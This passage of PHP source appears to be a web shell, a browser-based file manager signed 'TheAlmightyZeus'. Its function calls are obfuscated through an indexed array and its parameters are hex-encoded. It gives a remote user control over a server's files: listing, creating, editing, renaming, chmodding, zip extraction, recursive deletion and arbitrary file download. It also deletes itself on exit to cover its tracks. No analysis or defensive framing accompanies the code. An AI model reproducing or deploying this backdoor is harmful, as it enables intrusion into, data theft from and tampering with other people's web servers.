										<input name="b" class="x" type="text" value="'.$GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4).'">
										'.$d_.'
								'.$c_;
					if(!empty($_POST["b"])) {
						$x = $_POST["b"];
						$t = 0;
					for($i=strlen($x)-1;$i>=0;--$i)
						$t += (int)$x[$i]*pow(8, (strlen($x)-$i-1));
					if(!$GNJ[12](uhex($_GET["k"]), $t)) {
						ER();
					}
					else {
						OK();
						  }
						}
					}
					elseif(isset($_GET["l"])) {
						echo $a_.'+DIR'.$b_.'
									<form action="" method="post">
										<input name="l" class="x" type="text" value="">
										'.$d_.'
								'.$c_;
					if(isset($_POST["l"])) {
						if(!$GNJ[11]($_POST["l"])) {
							ER();
						}
						else {
							OK();
						}
					  }
					}
					elseif(isset($_GET["q"])) {
						if($GNJ[10](__FILE__)) {
							$GNJ[38]($GNJ[9]);
							header("Location: ".basename($_SERVER['PHP_SELF'])."");
							exit();
						}
						else {
							echo $g;
						}
					}
					elseif(isset($_GET["n"])) {
						echo $a_.'+FILE'.$b_.'
									<form action="" method="post">
										<input name="n" class="x" type="text" value="">
										'.$d_.'
								'.$c_;
					if(isset($_POST["n"])) {
						if(!$GNJ[25]($_POST["n"])) {
							ER();
						}
						else {
							OK();
						}
					  }
					}
					elseif(isset($_GET["r"])) {
						echo $a_.uhex($_GET["r"]).$b_.'
									<form action="" method="post">
										<input name="r" class="x" type="text" value="'.uhex($_GET["r"]).'">
										'.$d_.'
								'.$c_;
					if(isset($_POST["r"])) {
						if($GNJ[26]($_POST["r"])) {
							ER();
						}
						else {
							if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
								OK();
							}
							else {
								ER();
							}
						  }
					   }
					}
					elseif(isset($_GET["z"])) {
						$zip = new ZipArchive;
						$res = $zip->open(uhex($_GET["z"]));
							if($res === TRUE) {
								$zip->extractTo(uhex($_GET["d"]));
								$zip->close();
								OK();
							} else {
								ER();
						  }
					}
					else {
					echo '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th width="44%">[ NAME ]</th>
								<th width="11%">[ SIZE ]</th>
								<th width="17%">[ PERM ]</th>
								<th width="17%">[ DATE ]</th>
								<th width="11%">[ ACT ]</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td>
									<a class="ajx" href="?d='.hex($d).'&n">+FILE</a>
									<a class="ajx" href="?d='.hex($d).'&l">+DIR</a>
								</td>
							</tr>
						';

							$h = "";
							$j = "";
							$w = $GNJ[13]($d);
							if($GNJ[28]($w) || $GNJ[29]($w)) {
							foreach($w as $c){
								$e = $GNJ[14]("\\", "/", $d);
								if(!$GNJ[30]($c, ".zip")) {
									$zi = '';
								}
								else {
									$zi = '<a href="?d='.hex($e).'&z='.hex($c).'">U</a>';
								}
								if($GNJ[31]("$d/$c")) {
										$o = "";
								}
								elseif(!$GNJ[32]("$d/$c")) {
										$o = " h";
								}
								else {
										$o = " w";
								}
								$s = $GNJ[34]("$d/$c") / 1024;
								$s = round($s, 3);
								if($s>=1024) { 
									$s = round($s/1024, 2) . " MB";
								} else {
									$s = $s . " KB";
								}
							if(($c != ".") && ($c != "..")){
								($GNJ[8]("$d/$c")) ?
								$h .= '<tr class="r">
							<td>
								<i class="far fa-folder m"></i>
								<a class="ajx" href="?d='.hex($e).hex("/".$c).'">'.$c.'</a>
							</td>
							<td class="x">
								dir
							</td>
							<td class="x">
								<a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
								<a href="?d='.hex($e).'&x='.hex($c).'">D</a>
							</td>
						</tr>
						
						'
							:
								$j .= '<tr class="r">
							<td>
								<i class="far fa-file m"></i>&thinsp;
								<a class="ajx" href="?d='.hex($e).'&s='.hex($c).'">'.$c.'</a>
							</td>
							<td class="x">
								'.$s.'
							</td>
							<td class="x">
								<a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
								<a class="ajx" href="?d='.hex($e).'&e='.hex($c).'">E</a>
								<a href="?d='.hex($e).'&g='.hex($c).'">G</a>
								'.$zi.'
								<a href="?d='.hex($e).'&x='.hex($c).'">D</a>
							</td>
						</tr>
						
						';

							}
						}
					}

						echo $h;
						echo $j;
						echo '</tbody>
						<tfoot>
							<tr>
								<th class="et">
									<a class="ajx" href="?d='.hex($e).'&y">REQUEST</a>
									<a href="?d='.hex($e).'&q">EXIT</a>
								</th>
								<th class="et" width="11%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="11%"></th>
							</tr>
					</tfoot>
				</table>';
					}
					?>

			</article>
			<footer class="x">
				&copy;TheAlmightyZeus
			</footer>
			<?php
			if(isset($_GET["1"])) {
				echo $f;
			}
			elseif(isset($_GET["0"])) {
				echo $g;
			}
			else {
				NULL;
			}
			?>

			<script>
				$(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
			</script>
		</body>
	</html>
<?php
	function rec($j) {
		global $GNJ;
		if(trim(pathinfo($j, PATHINFO_BASENAME ), '.') === '') {
			return;
		}
		if($GNJ[8]($j)) {
			array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
			$GNJ[35]($j);
		}
		else {
			$GNJ[10]($j);
		}
	}
	function dre($y1, $y2) {
		global $GNJ;
		ob_start();
		$GNJ[16]($y1($y2));
		return $GNJ[36]();
	}
	function hex($n) {
		$y='';
		for ($i=0; $i < strlen($n); $i++){
			$y .= dechex(ord($n[$i]));
		}
		return $y;
	}
	function uhex($y) {
		$n='';
		for ($i=0; $i < strlen($y)-1; $i+=2){
			$n .= chr(hexdec($y[$i].$y[$i+1]));
		}
		return $n;
	}
	function OK() {
		global $GNJ, $d;
		$GNJ[38]($GNJ[9]);
		header("Location: ?d=".hex($d)."&1");
		exit();
	}
	function ER() {
		global $GNJ, $d;
		$GNJ[38]($GNJ[9]);
		header("Location: ?d=".hex($d)."&0");
		exit();
	}
	function x($c) {
		global $GNJ;
		$x = $GNJ[24]($c);
		if(($x & 0xC000) == 0xC000) {
			$u = "s";
		}
		elseif(($x & 0xA000) == 0xA000) {
			$u = "l";
		}
		elseif(($x & 0x8000) == 0x8000) {
			$u = "-";
		}
		elseif(($x & 0x6000) == 0x6000) {
			$u = "b";
		}
		elseif(($x & 0x4000) == 0x4000) {
			$u = "d";
		}
		elseif(($x & 0x2000) == 0x2000) {
			$u = "c";
		}
		elseif(($x & 0x1000) == 0x1000) {
			$u = "p";
		}
		else {
			$u = "u";
		}
		$u .= (($x & 0x0100) ? "r" : "-");
		$u .= (($x & 0x0080) ? "w" : "-");
		$u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));
		$u .= (($x & 0x0020) ? "r" : "-");
		$u .= (($x & 0x0010) ? "w" : "-");
		$u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));
		$u .= (($x & 0x0004) ? "r" : "-");
		$u .= (($x & 0x0002) ? "w" : "-");
		$u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));
		return $u;
	}
	if(isset($_GET["g"])) {
		$GNJ[38]($GNJ[9]);
		header("Content-Type: application/octet-stream");
		header("Content-Transfer-Encoding: Binary");
		header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));
		header("Content-disposition: attachment; filename=\"".uhex($_GET["g"])."\"");
		$GNJ[37](uhex($_GET["g"]));
	}
?>